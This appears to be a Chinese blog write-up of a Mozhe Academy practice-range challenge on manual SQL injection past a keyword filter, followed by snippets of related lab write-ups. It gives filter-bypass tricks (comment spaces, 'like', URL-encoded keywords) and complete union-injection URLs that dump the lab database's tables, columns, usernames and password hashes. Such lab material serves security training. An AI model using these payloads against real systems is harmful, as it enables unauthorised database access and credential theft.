SQL过滤字符后手工注入漏洞测试(第2题)——<墨者学院漏洞记录>

最新推荐文章于 2022-10-03 23:16:05 发布
最新推荐文章于 2022-10-03 23:16:05 发布
阅读量232 收藏
点赞数
分类专栏: 漏洞/靶场操作记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/118800642
版权

安全漏洞

http://219.153.49.228:40519/new_list.php?id=1

http://219.153.49.228:40519/new_list.php?id=1'
http://219.153.49.228:40519/new_list.php?id=1'%23

http://219.153.49.228:40519/new_list.php?id=1' and 1=1

经过上面几轮测试,可以看出本题:空格,单引号,等号,union,select,from都过滤。
因此进行替换:
空格 》 /**/
等号 》like
union》 %75nion
select》%73elect
from 》%66rom

爆库:

http://219.153.49.228:41005/new_list.php?id=-1/**/%75nion/**/%73elect/**/1,(database()),3,4

爆表:

%73elect/**/group_concat(TABLE_NAME)/**/%66rom/**/information_schema.TABLES/**/%77here/**/TABLE_SCHEMA/**/like/**/database()

http://219.153.49.228:41005/new_list.php?id=-1/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(TABLE_NAME)/**/%66rom/**/information_schema.TABLES/**/%77here/**/TABLE_SCHEMA/**/like/**/database()),3,4


爆字段:

%73elect/**/group_concat(COLUMN_NAME)/**/%66rom/**/information_schema.COLUMNS/**/%77here/**/TABLE_NAME=0x73746f726d67726f75705f6d656d626572

http://219.153.49.228:41005/new_list.php?id=-1/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(COLUMN_NAME)/**/%66rom/**/information_schema.COLUMNS/**/%77here/**/TABLE_NAME=0x73746f726d67726f75705f6d656d626572),3,4


爆status字段:

%73elect/**/group_concat(status)/**/%66rom/**/stormgroup_member

http://219.153.49.228:41005/new_list.php?id=-1/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(status)/**/%66rom/**/stormgroup_member),3,4


爆name和password字段:

%73elect/**/group_concat(name)/**/%66rom/**/stormgroup_member

http://219.153.49.228:41005/new_list.php?id=-1/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(name)/**/%66rom/**/stormgroup_member),(%73elect/**/group_concat(password)/**/%66rom/**/stormgroup_member),4

查询表名:/**/union/**/select/**/null,group_concat(table_name),null,null/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'查出表名:notice,stormgroup_member
查列名:
/**/union/**/select/**/null,group_concat(column_name),null,null/**/from/**/information_schema.columns/**/where/**/table_name='stormgroup_member'
查出列名:
id,length,name,password,time,status
字段值:
/**/union/**/select/**/null,group_concat(name),group_concat(password),null/**/from/**/stormgroup_member
查出字段值:
mozhe01,mozhe2,admin
d1bff12cf951bbb9f8d1c3e59620255b,a6babd9eb561e9ffd6f5aad28851daa7,4cfed2397c80f6c4c4f1dd61e44fdac0

admin对于password值解密登陆拿KEY:

墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院SQL过滤字符手工注入漏洞测试(第2)
没事我溜达
03-19 2261
过滤了空格、union、and、select等数据库查询关键字符
墨者学院----SQL过滤字符手工注入漏洞测试(第2)
qq_43590351的博客
01-26 454
SQL过滤字符手工注入漏洞测试(第2) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤 尝试利用like等于号和==/**/空格==进行绕过 ?id=1/**/order/**/by/**/4 页面正常说明字段数为4 接下来利用联合查询,看是否有回显点 ...
SQL过滤字符手工注入漏洞测试(第2)
weixin_47493074的博客
10-03 240
SQL过滤字符手工注入漏洞测试(第2)
墨者 - SQL过滤字符手工注入漏洞测试(第2)
吃肉唐僧的博客
07-11 650
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
墨者SQL过滤字符手工注入漏洞测试(第2)
wswr的博客
03-14 1224
思路:这相比较前一提的难点就是,你它到底过滤了啥,虽然说这个是难点,但是同时也是最无所谓的难点,毕竟,我就算不知道具体过滤啥,我还是该试的都试试,记得上提是用url编码然后绕过,那延续过来这行不行呢,然后你会发现,好像确实可以,emm,那好像真就和第一没什么大区别就算啦。(PS:上的思路就是用URL编码绕过检测) 总结一下:和上没什么区别,上懂了这一样的操作马上解决 那么就快速过一遍了(列还是4,回显点是2,3) 老样子查数据库查版本 /**/union/**/select/**/1,
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **攻击**:攻击者可能会利用SQL注入、XSS(跨站脚本)或其他方法来注入恶意代码,然后在服务器端执行。 3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害*...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6926
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者学院 SQL过滤字符手工注入漏洞测试(第3)
a519395243的博客
12-21 1485
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2702
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院 - CMS系统漏洞分析溯源(第2)
多崎巡礼的博客
08-06 1377
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
SQL过滤字符手工注入漏洞测试(第1)
Routine_limon的博客
07-15 584
一开始使用order by,and 1 =2这些命令没有反应,推测存在字符过滤。故而空格用/**/代替,=用like代替 另外使用用16进制转换url,防止url过滤 16进制转换我使用这个网站:http://web.chacuo.net/charseturlencode 明白了这些之后,按照之前的文章进行解:https://blog.csdn.net/Routine_limon/articl...
【Web】SQL手工注入Sql Server数据库 (漏洞测试)
HAPPY
07-30 3877
            【Web】SQL手工注入Sql Server数据库 (漏洞测试) 第一步:判断是否有注入,?id=2 and 1=1   正确;id=2 and 1=2  错误,得出有注入点。第二步:判断数据库类型:?id=2  and  exists (select  *  from  sysobjects) 显示正常, 表示是ms sql server数据库。 第三步:sqlmap...
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5412
和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3302
很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)
多崎巡礼的博客
08-16 2104
# 查看是否有注入点 http://ip/new_list.php?id=1' # 想办法闭合语句,查看所有集合 # db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写 http://ip/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值